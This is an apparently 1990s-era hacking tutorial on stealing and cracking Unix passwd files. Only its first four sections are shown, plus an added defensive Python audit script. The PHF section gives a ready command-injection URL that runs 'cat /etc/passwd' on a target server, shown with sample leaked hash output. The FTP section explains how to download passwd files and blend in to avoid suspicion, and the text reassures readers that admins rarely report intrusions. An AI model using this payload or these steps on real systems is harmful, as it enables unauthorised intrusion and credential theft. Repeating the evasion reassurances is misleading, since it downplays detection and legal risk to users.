CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________
1. Introduction
Passwd files are the easiest and simplest way to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on to the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activities. If you choose to do illegal activities with the information from this it is no one's fault but your own. Now down to the good stuff [=.
________________________
2. What is a Passwd File?
A passwd file is an encrypted file that contains the passwords of the users on a server. The key word here is encrypted, so don't start thinking all I have to do is find one and I hit the jackpot. Nope, sorry man, there's a lot more to it than that. The passwd file should look something like this:
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid nobody:/:
noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc. Here's how you read the file:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
Username: rrc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
That is the only name you could use because it is the only one with an encrypted password. You will never find a passwd file that has a passwd for anything like ftp, listen, bin, etc. Occasionally, using the PHF exploit or unshadowing a passwd file, you can get an encrypted password for root.
________________________
3. PHF Exploit
First let me explain what an exploit is. An exploit is a hole in software that allows someone to get something out of it that... well, you aren't supposed to.
The PHF exploit is a hole in CGI that most servers have fixed now (if they have CGI). Let's just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many foreign servers have this open. Unlike the FTP passwd, you don't even have to access their FTP or log in. What you do is get a WWW browser and then in the place for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In place of www.target.com put the server whose passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it." it's not there. If you get "You have been caught on Candid Camera!" they caught you, but don't fear, they rarely ever report you. I have yet to find a server that does report. Of course if you get something like:
root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin:/bin:
sys:*:3:3:Admin:/usr/src:
adm:*:4:4:Admin:/usr/adm:/sbin/sh
daemon:*:1:1:Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
You have hit the jackpot [=. Save the file as text and keep it handy, because you will need it later in the lesson.
________________________
4. FTP Passwd
The passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desperate to get a passwd file from a certain server (which may not even be open, so only do this if you are desperate or you want to hack your own server), get an account that allows you access to their FTP.

What you do is get an FTP client such as WS_FTP or CuteFTP. Find the server's name and connect to it. You should get a list of directories like "etc, hidden, incoming, pub"; go to the one called etc. Inside etc should be a few files like "group, passwd". If by any chance you see one called shadow, there is an 8/10 chance you are about to deal with a shadowed passwd. Well, get the passwd file and maybe check out what else is on the server so it won't look so suspicious.

Anyway, when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:) with a * (or another symbol), you have a shadowed passwd. Of course, if you have been reading and paying attention, if you have something that has a few things that look like:
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
You have gotten one you can crack.
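As an added example (not part of the original text), here is a small audit script, written from the sysadmin's side, that reads entries in the format section 2 walks through and reports which accounts carry a password hash in the passwd file itself rather than the "x" or "*" placeholder that section 4 describes as uncrackable. The sample lines are constructed from the entries quoted above, and the function names are my own.

```python
import re

# Constructed sample entries, copied from the format shown in this text (not a real host)
SAMPLE_PASSWD = """\
root:x:0:1:0000-Admin(0000):/:/bin/ksh
listen:x:37:4:Network Admin:/usr/net/nls:
bin:*:2:2:Admin:/bin:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
"""

# Traditional DES crypt(3) output: 2-char salt + 11 chars, all drawn from this alphabet
DES_HASH = re.compile(r"^[./0-9A-Za-z]{13}$")

def parse_passwd_line(line):
    """Split one colon-separated passwd entry into its seven fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}: {line!r}")
    name, pw, uid, gid, gecos, home, shell = fields
    return {"name": name, "passwd": pw, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell}

def classify_password_field(pw):
    """Label the second field the way the text describes it."""
    if pw == "x":
        return "shadowed"   # the real hash lives in /etc/shadow, not here
    if pw == "":
        return "empty"      # no password at all: worse than an exposed hash
    if pw.startswith("*") or pw.startswith("!"):
        return "locked"     # system account, nothing to crack
    if DES_HASH.match(pw):
        return "hash"       # crackable offline if this file is readable
    return "unknown"

def audit_passwd(text):
    """Return the names of accounts whose secret is exposed in the passwd file itself."""
    exposed = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        entry = parse_passwd_line(line)
        if classify_password_field(entry["passwd"]) in ("hash", "empty"):
            exposed.append(entry["name"])
    return exposed

if __name__ == "__main__":
    print("accounts with exposed hashes:", audit_passwd(SAMPLE_PASSWD))
```

Run against a real /etc/passwd, a non-empty result means the file should be shadowed (or the anonymous FTP copy of it replaced with a stub) before anyone else downloads it.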
________________________
Check part 2 to continue reading...